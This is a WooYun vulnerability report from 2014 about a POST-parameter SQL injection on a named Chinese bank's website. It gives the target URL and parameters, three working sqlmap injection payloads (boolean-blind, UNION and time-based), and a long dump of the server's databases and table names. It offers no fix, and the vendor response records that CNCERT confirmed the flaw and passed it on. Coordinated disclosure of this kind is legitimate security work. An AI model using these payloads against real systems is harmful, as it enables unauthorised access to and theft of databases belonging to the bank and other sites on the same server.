漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-086778
漏洞标题:吉林某商业银行某POST类型SQL注入
相关厂商:cncert国家互联网应急中心
漏洞作者: SuperRookie
提交时间:2014-12-11 14:34
修复时间:2015-01-25 14:36
公开时间:2015-01-25 14:36
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-12-11: 细节已通知厂商并且等待厂商处理中
2014-12-16: 厂商已经确认,细节仅向厂商公开
2014-12-26: 细节向核心白帽子及相关领域专家公开
2015-01-05: 细节向普通白帽子公开
2015-01-15: 细节向实习白帽子公开
2015-01-25: 细节向公众公开
简要描述:
SuperRookie
详细说明:
post sql 注入 没深入
漏洞证明:
http://www.jtnsh.com/map/wdcx.php
gjz=88952634&shi=0&leixing=0&sheng=0
<code>sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Place: POST
Parameter: sheng
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: sheng=0' RLIKE (SELECT (CASE WHEN (3173=3173) THEN 0 ELSE 0x28 END)) AND 'WHXI'='WHXI&shi=0&leixing=0&gjz=88952634
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: sheng=0' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7161776771,0x6870595577426a777471,0x7165766371),NULL,NULL,NULL,NULL,NULL,NULL#&shi=0&leixing=0&gjz=88952634
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: sheng=0' AND 7940=BENCHMARK(5000000,MD5(0x474c746a)) AND 'YBoM'='YBoM&shi=0&leixing=0&gjz=88952634
---
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
Database: shop
[176 tables]
+----------------------------------------------------+
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_affiliate_log |
| ecs_agency |
| ecs_area_region |
| ecs_article |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_gallery |
| ecs_goods_type |
| ecs_group_goods |
| ecs_keywords |
| ecs_link_goods |
| ecs_mail_templates |
| ecs_member_price |
| ecs_nav |
| ecs_order_action |
| ecs_order_goods |
| ecs_order_info |
| ecs_pack |
| ecs_package_goods |
| ecs_pay_log |
| ecs_payment |
| ecs_plugins |
| ecs_products |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_searchengine |
| ecs_sessions |
| ecs_sessions_data |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_snatch_log |
| ecs_stats |
| ecs_suppliers |
| ecs_tag |
| ecs_template |
| ecs_topic |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_feed |
| ecs_user_rank |
| ecs_users |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_wholesale |
| jt_account_log |
| jt_ad |
| jt_ad_custom |
| jt_ad_position |
| jt_admin_action |
| jt_admin_log |
| jt_admin_message |
| jt_admin_user |
| jt_adsense |
| jt_affiliate_log |
| jt_agency |
| jt_area_region |
| jt_article |
| jt_article_cat |
| jt_attribute |
| jt_auction_log |
| jt_auto_manage |
| jt_back_goods |
| jt_back_order |
| jt_bonus_type |
| jt_booking_goods |
| jt_brand |
| jt_card |
| jt_cart |
| jt_cat_recommend |
| jt_category |
| jt_collect_goods |
| jt_comment |
| jt_crons |
| jt_delivery_goods |
| jt_delivery_order |
| jt_email_list |
| jt_email_sendlist |
| jt_error_log |
| jt_exchange_goods |
| jt_favourable_activity |
| jt_feedback |
| jt_friend_link |
| jt_goods |
| jt_goods_activity |
| jt_goods_article |
| jt_goods_attr |
| jt_goods_cat |
| jt_goods_gallery |
| jt_goods_type |
| jt_group_goods |
| jt_keywords |
| jt_link_goods |
| jt_mail_templates |
| jt_member_price |
| jt_nav |
| jt_order_action |
| jt_order_goods |
| jt_order_info |
| jt_pack |
| jt_package_goods |
| jt_pay_log |
| jt_payment |
| jt_plugins |
| jt_products |
| jt_reg_extend_info |
| jt_reg_fields |
| jt_region |
| jt_role |
| jt_searchengine |
| jt_sessions |
| jt_sessions_data |
| jt_shipping |
| jt_shipping_area |
| jt_shop_config |
| jt_snatch_log |
| jt_stats |
| jt_suppliers |
| jt_tag |
| jt_template |
| jt_topic |
| jt_user_account |
| jt_user_address |
| jt_user_bonus |
| jt_user_feed |
| jt_user_rank |
| jt_users |
| jt_virtual_card |
| jt_volume_price |
| jt_vote |
| jt_vote_log |
| jt_vote_option |
| jt_wholesale |
+----------------------------------------------------+
Database: mibew_db1
[11 tables]
+----------------------------------------------------+
| chatban |
| chatconfig |
| chatgroup |
| chatgroupoperator |
| chatmessage |
| chatnotification |
| chatoperator |
| chatresponses |
| chatrevision |
| chatthread |
| jt_liuyan |
+----------------------------------------------------+
Database: jtnsh
[95 tables]
+----------------------------------------------------+
| jt_form_content_9.0 |
| jt_form_content_9.1 |
| chatban |
| chatconfig |
| chatgroup |
| chatgroupoperator |
| chatmessage |
| chatnotification |
| chatoperator |
| chatresponses |
| chatrevision |
| chatthread |
| jt_ad_compete_place |
| jt_ad_compete_user |
| jt_ad_config |
| jt_ad_norm_place |
| jt_ad_norm_user |
| jt_admin_menu |
| jt_alonepage |
| jt_area |
| jt_article |
| jt_article_content_100 |
| jt_article_content_101 |
| jt_article_content_102 |
| jt_article_content_103 |
| jt_article_content_104 |
| jt_article_content_105 |
| jt_article_db |
| jt_article_module |
| jt_channel |
| jt_collection |
| jt_comment |
| jt_config |
| jt_copyfrom |
| jt_crontab |
| jt_form_config |
| jt_form_content |
| jt_form_content_1 |
| jt_form_content_10 |
| jt_form_content_2 |
| jt_form_content_3 |
| jt_form_content_4 |
| jt_form_content_5 |
| jt_form_content_6 |
| jt_form_content_7 |
| jt_form_content_8 |
| jt_form_content_9 |
| jt_form_module |
| jt_form_reply |
| jt_friendlink |
| jt_friendlink_sort |
| jt_fu_article |
| jt_fu_sort |
| jt_gather_rule |
| jt_gather_sort |
| jt_group |
| jt_guestbook_config |
| jt_guestbook_content |
| jt_guestbook_sort |
| jt_hack |
| jt_jfabout |
| jt_jfsort |
| jt_keyword |
| jt_keywordid |
| jt_label |
| jt_limitword |
| jt_liuyan |
| jt_memberdata |
| jt_members |
| jt_menu |
| jt_module |
| jt_moneylog |
| jt_olpay |
| jt_pm |
| jt_regnum |
| jt_reply |
| jt_report |
| jt_shoporderproduct |
| jt_shoporderuser |
| jt_small |
| jt_small_enter |
| jt_small_per |
| jt_sort |
| jt_special |
| jt_special_comment |
| jt_spsort |
| jt_template |
| jt_template_bak |
| jt_upfile |
| jt_vote_comment |
| jt_vote_config |
| jt_vote_element |
| jt_vote_topic |
| jt_yzimg |
| workscontent |
+----------------------------------------------------+
Database: mengs
[35 tables]
+----------------------------------------------------+
| modx_active_users |
| modx_categories |
| modx_document_groups |
| modx_documentgroup_names |
| modx_event_log |
| modx_manager_log |
| modx_manager_users |
| modx_member_groups |
| modx_membergroup_access |
| modx_membergroup_names |
| modx_site_content |
| modx_site_htmlsnippets |
| modx_site_module_access |
| modx_site_module_depobj |
| modx_site_modules |
| modx_site_plugin_events |
| modx_site_plugins |
| modx_site_snippets |
| modx_site_templates |
| modx_site_tmplvar_access |
| modx_site_tmplvar_contentvalues |
| modx_site_tmplvar_templates |
| modx_site_tmplvars |
| modx_system_eventnames |
| modx_system_settings |
| modx_user_attributes |
| modx_user_messages |
| modx_user_roles |
| modx_user_settings |
| modx_web_groups |
| modx_web_user_attributes |
| modx_web_user_settings |
| modx_web_users |
| modx_webgroup_access |
| modx_webgroup_names |
+----------------------------------------------------+
Database: shopnc
[185 tables]
+----------------------------------------------------+
| shopnc_activity |
| shopnc_activity_detail |
| shopnc_address |
| shopnc_admin |
| shopnc_admin_log |
| shopnc_adv |
| shopnc_adv_click |
| shopnc_adv_position |
| shopnc_album_class |
| shopnc_album_pic |
| shopnc_area |
| shopnc_article |
| shopnc_article_class |
| shopnc_attribute |
| shopnc_attribute_value |
| shopnc_brand |
| shopnc_cart |
| shopnc_chat_log |
| shopnc_chat_msg |
| shopnc_circle |
| shopnc_circle_affix |
| shopnc_circle_class |
| shopnc_circle_explog |
| shopnc_circle_expmember |
| shopnc_circle_exptheme |
| shopnc_circle_fs |
| shopnc_circle_inform |
| shopnc_circle_like |
| shopnc_circle_mapply |
| shopnc_circle_member |
| shopnc_circle_ml |
| shopnc_circle_mldefault |
| shopnc_circle_mlref |
| shopnc_circle_recycle |
| shopnc_circle_thclass |
| shopnc_circle_theme |
| shopnc_circle_thg |
| shopnc_circle_thpoll |
| shopnc_circle_thpolloption |
| shopnc_circle_thpollvoter |
| shopnc_circle_threply |
| shopnc_cms_article |
| shopnc_cms_article_attitude |
| shopnc_cms_article_class |
| shopnc_cms_comment |
| shopnc_cms_comment_up |
| shopnc_cms_index_module |
| shopnc_cms_module |
| shopnc_cms_module_assembly |
| shopnc_cms_module_frame |
| shopnc_cms_navigation |
| shopnc_cms_picture |
| shopnc_cms_picture_class |
| shopnc_cms_picture_image |
| shopnc_cms_special |
| shopnc_cms_tag |
| shopnc_cms_tag_relation |
| shopnc_complain |
| shopnc_complain_goods |
| shopnc_complain_subject |
| shopnc_complain_talk |
| shopnc_consult |
| shopnc_cron |
| shopnc_daddress |
| shopnc_document |
| shopnc_evaluate_goods |
| shopnc_evaluate_store |
| shopnc_express |
| shopnc_favorites |
| shopnc_flowstat_1 |
| shopnc_flowstat_2 |
| shopnc_flowstat_3 |
| shopnc_flowstat_4 |
| shopnc_flowstat_5 |
| shopnc_gadmin |
| shopnc_goods |
| shopnc_goods_attr_index |
| shopnc_goods_class |
| shopnc_goods_class_staple |
| shopnc_goods_class_tag |
| shopnc_goods_common |
| shopnc_goods_images |
| shopnc_groupbuy |
| shopnc_groupbuy_area |
| shopnc_groupbuy_class |
| shopnc_groupbuy_price_range |
| shopnc_groupbuy_quota |
| shopnc_inform |
| shopnc_inform_subject |
| shopnc_inform_subject_type |
| shopnc_invoice |
| shopnc_lock |
| shopnc_mail_msg_temlates |
| shopnc_member |
| shopnc_message |
| shopnc_micro_adv |
| shopnc_micro_comment |
| shopnc_micro_goods |
| shopnc_micro_goods_class |
| shopnc_micro_goods_relation |
| shopnc_micro_like |
| shopnc_micro_member_info |
| shopnc_micro_personal |
| shopnc_micro_personal_class |
| shopnc_micro_store |
| shopnc_navigation |
| shopnc_offpay_area |
| shopnc_order |
| shopnc_order_bill |
| shopnc_order_common |
| shopnc_order_goods |
| shopnc_order_log |
| shopnc_order_pay |
| shopnc_order_statis |
| shopnc_p_booth_goods |
| shopnc_p_booth_quota |
| shopnc_p_bundling |
| shopnc_p_bundling_goods |
| shopnc_p_bundling_quota |
| shopnc_p_mansong |
| shopnc_p_mansong_quota |
| shopnc_p_mansong_rule |
| shopnc_p_xianshi |
| shopnc_p_xianshi_goods |
| shopnc_p_xianshi_quota |
| shopnc_payment |
| shopnc_pd_cash |
| shopnc_pd_log |
| shopnc_pd_recharge |
| shopnc_points_cart |
| shopnc_points_goods |
| shopnc_points_log |
| shopnc_points_order |
| shopnc_points_orderaddress |
| shopnc_points_ordergoods |
| shopnc_rec_position |
| shopnc_refund_return |
| shopnc_salenum |
| shopnc_seller |
| shopnc_seller_group |
| shopnc_seller_log |
| shopnc_seo |
| shopnc_setting |
| shopnc_sns_albumclass |
| shopnc_sns_albumpic |
| shopnc_sns_binding |
| shopnc_sns_comment |
| shopnc_sns_friend |
| shopnc_sns_goods |
| shopnc_sns_membertag |
| shopnc_sns_mtagmember |
| shopnc_sns_setting |
| shopnc_sns_sharegoods |
| shopnc_sns_sharestore |
| shopnc_sns_tracelog |
| shopnc_sns_visitor |
| shopnc_spec |
| shopnc_spec_value |
| shopnc_stat_member |
| shopnc_store |
| shopnc_store_bind_class |
| shopnc_store_class |
| shopnc_store_cost |
| shopnc_store_extend |
| shopnc_store_goods_class |
| shopnc_store_grade |
| shopnc_store_joinin |
| shopnc_store_navigation |
| shopnc_store_plate |
| shopnc_store_sns_comment |
| shopnc_store_sns_setting |
| shopnc_store_sns_tracelog |
| shopnc_store_watermark |
| shopnc_transport |
| shopnc_transport_extend |
| shopnc_type |
| shopnc_type_brand |
| shopnc_type_spec |
| shopnc_upload |
| shopnc_voucher |
| shopnc_voucher_price |
| shopnc_voucher_quota |
| shopnc_voucher_template |
| shopnc_web |
| shopnc_web_code |
+----------------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------------+
Database: pigcms
[175 tables]
+----------------------------------------------------+
| pigcms_access |
| pigcms_adma |
| pigcms_alipay_config |
| pigcms_api |
| pigcms_areply |
| pigcms_attribute |
| pigcms_behavior |
| pigcms_busines |
| pigcms_busines_comment |
| pigcms_busines_main |
| pigcms_busines_pic |
| pigcms_busines_second |
| pigcms_car |
| pigcms_car_utility |
| pigcms_carmodel |
| pigcms_carnews |
| pigcms_carowner |
| pigcms_carsaler |
| pigcms_carseries |
| pigcms_carset |
| pigcms_caruser |
| pigcms_case |
| pigcms_catemenu |
| pigcms_classify |
| pigcms_company |
| pigcms_company_staff |
| pigcms_dining_table |
| pigcms_dish |
| pigcms_dish_company |
| pigcms_dish_like |
| pigcms_dish_order |
| pigcms_dish_sort |
| pigcms_dish_table |
| pigcms_diyform |
| pigcms_diyform_set |
| pigcms_diymen_class |
| pigcms_diymen_set |
| pigcms_estate |
| pigcms_estate_album |
| pigcms_estate_expert |
| pigcms_estate_housetype |
| pigcms_estate_impress |
| pigcms_estate_impress_add |
| pigcms_estate_son |
| pigcms_files |
| pigcms_flash |
| pigcms_forum_comment |
| pigcms_forum_config |
| pigcms_forum_message |
| pigcms_forum_topics |
| pigcms_function |
| pigcms_greeting_card |
| pigcms_home |
| pigcms_home_background |
| pigcms_host |
| pigcms_host_list_add |
| pigcms_host_order |
| pigcms_hotels_house |
| pigcms_hotels_house_sort |
| pigcms_hotels_order |
| pigcms_img |
| pigcms_indent |
| pigcms_keyword |
| pigcms_leave |
| pigcms_links |
| pigcms_lottery |
| pigcms_lottery_cheat |
| pigcms_lottery_record |
| pigcms_medical_set |
| pigcms_medical_user |
| pigcms_member |
| pigcms_member_card_contact |
| pigcms_member_card_coupon |
| pigcms_member_card_create |
| pigcms_member_card_exchange |
| pigcms_member_card_info |
| pigcms_member_card_integral |
| pigcms_member_card_notice |
| pigcms_member_card_set |
| pigcms_member_card_sign |
| pigcms_member_card_use_record |
| pigcms_member_card_vip |
| pigcms_moopha_article |
| pigcms_moopha_attachement |
| pigcms_moopha_channel |
| pigcms_moopha_channel_contentattribute |
| pigcms_moopha_keywords |
| pigcms_moopha_picture |
| pigcms_moopha_site |
| pigcms_moopha_template |
| pigcms_moopha_user |
| pigcms_msg |
| pigcms_nearby_user |
| pigcms_node |
| pigcms_norms |
| pigcms_ordering_class |
| pigcms_ordering_set |
| pigcms_other |
| pigcms_panorama |
| pigcms_photo |
| pigcms_photo_list |
| pigcms_pic_wall |
| pigcms_pic_walllog |
| pigcms_product |
| pigcms_product_attribute |
| pigcms_product_cart |
| pigcms_product_cart_list |
| pigcms_product_cat |
| pigcms_product_detail |
| pigcms_product_diningtable |
| pigcms_product_image |
| pigcms_product_mail_price |
| pigcms_product_setting |
| pigcms_recipe |
| pigcms_recognition |
| pigcms_reply |
| pigcms_reply_info |
| pigcms_requestdata |
| pigcms_reservation |
| pigcms_reservebook |
| pigcms_role |
| pigcms_role_user |
| pigcms_router |
| pigcms_router_config |
| pigcms_school_classify |
| pigcms_school_score |
| pigcms_school_set_index |
| pigcms_school_students |
| pigcms_school_tcourse |
| pigcms_school_teachers |
| pigcms_selfform |
| pigcms_selfform_input |
| pigcms_selfform_value |
| pigcms_send_message |
| pigcms_service_logs |
| pigcms_service_user |
| pigcms_shake |
| pigcms_shake_rt |
| pigcms_shakelog |
| pigcms_share |
| pigcms_share_set |
| pigcms_site_plugmenu |
| pigcms_sms_expendrecord |
| pigcms_sms_record |
| pigcms_snccode |
| pigcms_styleset |
| pigcms_system_info |
| pigcms_taobao |
| pigcms_text |
| pigcms_token_open |
| pigcms_update_record |
| pigcms_upyun_attachement |
| pigcms_user |
| pigcms_user_group |
| pigcms_user_request |
| pigcms_userinfo |
| pigcms_users |
| pigcms_vcard |
| pigcms_vcard_list |
| pigcms_voiceresponse |
| pigcms_vote |
| pigcms_vote_item |
| pigcms_vote_record |
| pigcms_wall |
| pigcms_wall_member |
| pigcms_wall_message |
| pigcms_wall_prize_record |
| pigcms_wecha_user |
| pigcms_wechat_group |
| pigcms_wechat_group_list |
| pigcms_wecht_grout |
| pigcms_wedding |
| pigcms_wedding_info |
| pigcms_wehcat_member_enddate |
| pigcms_wxuser |
+----------------------------------------------------+
Database: mibew_db
[11 tables]
+----------------------------------------------------+
| chatban |
| chatconfig |
| chatgroup |
| chatgroupoperator |
| chatmessage |
| chatnotification |
| chatoperator |
| chatresponses |
| chatrevision |
| chatthread |
| jt_liuyan |
+----------------------------------------------------+
Database: oldcbsnsh
[78 tables]
+----------------------------------------------------+
| qb_ad_compete_place |
| qb_ad_compete_user |
| qb_ad_config |
| qb_ad_norm_place |
| qb_ad_norm_user |
| qb_admin_menu |
| qb_alonepage |
| qb_area |
| qb_article |
| qb_article_content_100 |
| qb_article_content_101 |
| qb_article_content_102 |
| qb_article_content_103 |
| qb_article_content_104 |
| qb_article_content_105 |
| qb_article_db |
| qb_article_module |
| qb_channel |
| qb_collection |
| qb_comment |
| qb_config |
| qb_copyfrom |
| qb_crontab |
| qb_form_config |
| qb_form_content |
| qb_form_content_1 |
| qb_form_content_2 |
| qb_form_content_3 |
| qb_form_content_4 |
| qb_form_content_5 |
| qb_form_content_6 |
| qb_form_content_7 |
| qb_form_content_8 |
| qb_form_module |
| qb_form_reply |
| qb_friendlink |
| qb_friendlink_sort |
| qb_fu_article |
| qb_fu_sort |
| qb_gather_rule |
| qb_gather_sort |
| qb_group |
| qb_guestbook_config |
| qb_guestbook_content |
| qb_guestbook_sort |
| qb_hack |
| qb_jfabout |
| qb_jfsort |
| qb_keyword |
| qb_keywordid |
| qb_label |
| qb_limitword |
| qb_memberdata |
| qb_members |
| qb_menu |
| qb_module |
| qb_moneycard |
| qb_moneylog |
| qb_olpay |
| qb_pm |
| qb_propagandize |
| qb_regnum |
| qb_reply |
| qb_report |
| qb_shoporderproduct |
| qb_shoporderuser |
| qb_sort |
| qb_special |
| qb_special_comment |
| qb_spsort |
| qb_template |
| qb_template_bak |
| qb_upfile |
| qb_vote_comment |
| qb_vote_config |
| qb_vote_element |
| qb_vote_topic |
| qb_yzimg |
+----------------------------------------------------+
Database: weili
[3 tables]
+----------------------------------------------------+
| user |
| shop_cont |
| shop_list |
+----------------------------------------------------+
Database: atutor
[116 tables]
+----------------------------------------------------+
| at_admin_log |
| at_admins |
| at_assignments |
| at_auto_enroll |
| at_auto_enroll_courses |
| at_backups |
| at_basiclti_content |
| at_basiclti_tools |
| at_blog_posts |
| at_blog_posts_comments |
| at_blog_subscription |
| at_config |
| at_content |
| at_content_forums_assoc |
| at_content_prerequisites |
| at_content_tests_assoc |
| at_course_access |
| at_course_cats |
| at_course_enrollment |
| at_course_stats |
| at_courses |
| at_external_resources |
| at_faq_entries |
| at_faq_topics |
| at_feeds |
| at_fha_student_tools |
| at_file_storage_groups |
| at_files |
| at_files_comments |
| at_folders |
| at_forums |
| at_forums_accessed |
| at_forums_courses |
| at_forums_groups |
| at_forums_subscriptions |
| at_forums_threads |
| at_glossary |
| at_grade_scales |
| at_grade_scales_detail |
| at_gradebook_detail |
| at_gradebook_tests |
| at_groups |
| at_groups_members |
| at_groups_types |
| at_guests |
| at_handbook_notes |
| at_instructor_approvals |
| at_language_pages |
| at_language_text |
| at_languages |
| at_links |
| at_links_categories |
| at_mail_queue |
| at_master_list |
| at_member_login_attempt |
| at_member_track |
| at_members |
| at_messages |
| at_messages_sent |
| at_modules |
| at_myown_patches |
| at_myown_patches_dependent |
| at_myown_patches_files |
| at_news |
| at_oauth_client_servers |
| at_oauth_client_tokens |
| at_pa_album_comments |
| at_pa_albums |
| at_pa_course_album |
| at_pa_groups |
| at_pa_photo_comments |
| at_pa_photos |
| at_patches |
| at_patches_files |
| at_patches_files_actions |
| at_polls |
| at_polls_members |
| at_primary_resources |
| at_primary_resources_types |
| at_reading_list |
| at_related_content |
| at_resource_types |
| at_secondary_resources |
| at_secondary_resources_types |
| at_social_activities |
| at_social_application_settings |
| at_social_applications |
| at_social_friend_requests |
| at_social_friends |
| at_social_groups |
| at_social_groups_activities |
| at_social_groups_board |
| at_social_groups_invitations |
| at_social_groups_members |
| at_social_groups_requests |
| at_social_groups_types |
| at_social_member_additional_information |
| at_social_member_contact |
| at_social_member_education |
| at_social_member_personal |
| at_social_member_position |
| at_social_member_representation |
| at_social_member_track |
| at_social_member_websites |
| at_social_members_applications |
| at_social_privacy_preferences |
| at_social_user_settings |
| at_tests |
| at_tests_answers |
| at_tests_groups |
| at_tests_questions |
| at_tests_questions_assoc |
| at_tests_questions_categories |
| at_tests_results |
| at_themes |
| at_users_online |
+----------------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------------+
Database: jsss
[441 tables]
+----------------------------------------------------+
| jsbbs_common_addon |
| jsbbs_common_admincp_cmenu |
| jsbbs_common_admincp_group |
| jsbbs_common_admincp_member |
| jsbbs_common_admincp_perm |
| jsbbs_common_admincp_session |
| jsbbs_common_admingroup |
| jsbbs_common_adminnote |
| jsbbs_common_advertisement |
| jsbbs_common_advertisement_custom |
| jsbbs_common_banned |
| jsbbs_common_block |
| jsbbs_common_block_favorite |
| jsbbs_common_block_item |
| jsbbs_common_block_item_data |
| jsbbs_common_block_permission |
| jsbbs_common_block_pic |
| jsbbs_common_block_style |
| jsbbs_common_block_xml |
| jsbbs_common_cache |
| jsbbs_common_card |
| jsbbs_common_card_log |
| jsbbs_common_card_type |
| jsbbs_common_credit_log |
| jsbbs_common_credit_rule |
| jsbbs_common_credit_rule_log |
| jsbbs_common_credit_rule_log_field |
| jsbbs_common_cron |
| jsbbs_common_district |
| jsbbs_common_diy_data |
| jsbbs_common_domain |
| jsbbs_common_failedlogin |
| jsbbs_common_friendlink |
| jsbbs_common_grouppm |
| jsbbs_common_invite |
| jsbbs_common_magic |
| jsbbs_common_magiclog |
| jsbbs_common_mailcron |
| jsbbs_common_mailqueue |
| jsbbs_common_member |
| jsbbs_common_member_action_log |
| jsbbs_common_member_connect |
| jsbbs_common_member_count |
| jsbbs_common_member_field_forum |
| jsbbs_common_member_field_home |
| jsbbs_common_member_grouppm |
| jsbbs_common_member_log |
| jsbbs_common_member_magic |
| jsbbs_common_member_profile |
| jsbbs_common_member_profile_setting |
| jsbbs_common_member_security |
| jsbbs_common_member_stat_field |
| jsbbs_common_member_stat_fieldcache |
| jsbbs_common_member_stat_search |
| jsbbs_common_member_stat_searchcache |
| jsbbs_common_member_status |
| jsbbs_common_member_validate |
| jsbbs_common_member_verify |
| jsbbs_common_member_verify_info |
| jsbbs_common_moderate |
| jsbbs_common_myapp |
| jsbbs_common_myinvite |
| jsbbs_common_mytask |
| jsbbs_common_nav |
| jsbbs_common_onlinetime |
| jsbbs_common_plugin |
| jsbbs_common_pluginvar |
| jsbbs_common_process |
| jsbbs_common_regip |
| jsbbs_common_relatedlink |
| jsbbs_common_report |
| jsbbs_common_searchindex |
| jsbbs_common_secquestion |
| jsbbs_common_session |
| jsbbs_common_setting |
| jsbbs_common_smiley |
| jsbbs_common_sphinxcounter |
| jsbbs_common_stat |
| jsbbs_common_statuser |
| jsbbs_common_style |
| jsbbs_common_stylevar |
| jsbbs_common_syscache |
| jsbbs_common_tag |
| jsbbs_common_tagitem |
| jsbbs_common_task |
| jsbbs_common_taskvar |
| jsbbs_common_template |
| jsbbs_common_template_block |
| jsbbs_common_template_permission |
| jsbbs_common_uin_black |
| jsbbs_common_usergroup |
| jsbbs_common_usergroup_field |
| jsbbs_common_word |
| jsbbs_common_word_type |
| jsbbs_connect_feedlog |
| jsbbs_connect_memberbindlog |
| jsbbs_connect_tlog |
| jsbbs_forum_access |
| jsbbs_forum_activity |
| jsbbs_forum_activityapply |
| jsbbs_forum_announcement |
| jsbbs_forum_attachment |
| jsbbs_forum_attachment_0 |
| jsbbs_forum_attachment_1 |
| jsbbs_forum_attachment_2 |
| jsbbs_forum_attachment_3 |
| jsbbs_forum_attachment_4 |
| jsbbs_forum_attachment_5 |
| jsbbs_forum_attachment_6 |
| jsbbs_forum_attachment_7 |
| jsbbs_forum_attachment_8 |
| jsbbs_forum_attachment_9 |
| jsbbs_forum_attachment_unused |
| jsbbs_forum_attachtype |
| jsbbs_forum_bbcode |
| jsbbs_forum_creditslog |
| jsbbs_forum_debate |
| jsbbs_forum_debatepost |
| jsbbs_forum_faq |
| jsbbs_forum_forum |
| jsbbs_forum_forum_threadtable |
| jsbbs_forum_forumfield |
| jsbbs_forum_forumrecommend |
| jsbbs_forum_groupcreditslog |
| jsbbs_forum_groupfield |
| jsbbs_forum_groupinvite |
| jsbbs_forum_grouplevel |
| jsbbs_forum_groupranking |
| jsbbs_forum_groupuser |
| jsbbs_forum_imagetype |
| jsbbs_forum_medal |
| jsbbs_forum_medallog |
| jsbbs_forum_memberrecommend |
| jsbbs_forum_moderator |
| jsbbs_forum_modwork |
| jsbbs_forum_onlinelist |
| jsbbs_forum_order |
| jsbbs_forum_poll |
| jsbbs_forum_polloption |
| jsbbs_forum_pollvoter |
| jsbbs_forum_post |
| jsbbs_forum_post_tableid |
| jsbbs_forum_postcomment |
| jsbbs_forum_postlog |
| jsbbs_forum_postposition |
| jsbbs_forum_poststick |
| jsbbs_forum_promotion |
| jsbbs_forum_ratelog |
| jsbbs_forum_relatedthread |
| jsbbs_forum_replycredit |
| jsbbs_forum_rsscache |
| jsbbs_forum_spacecache |
| jsbbs_forum_statlog |
| jsbbs_forum_thread |
| jsbbs_forum_threadclass |
| jsbbs_forum_threadimage |
| jsbbs_forum_threadlog |
| jsbbs_forum_threadmod |
| jsbbs_forum_threadpartake |
| jsbbs_forum_threadrush |
| jsbbs_forum_threadtype |
| jsbbs_forum_trade |
| jsbbs_forum_tradecomment |
| jsbbs_forum_tradelog |
| jsbbs_forum_typeoption |
| jsbbs_forum_typeoptionvar |
| jsbbs_forum_typevar |
| jsbbs_forum_warning |
| jsbbs_home_album |
| jsbbs_home_album_category |
| jsbbs_home_appcreditlog
修复方案:
不会
版权声明:转载请注明来源 SuperRookie@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2014-12-16 13:46
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给吉林分中心,由吉林分中心后续协调网站管理单位处置。
最新状态:
暂无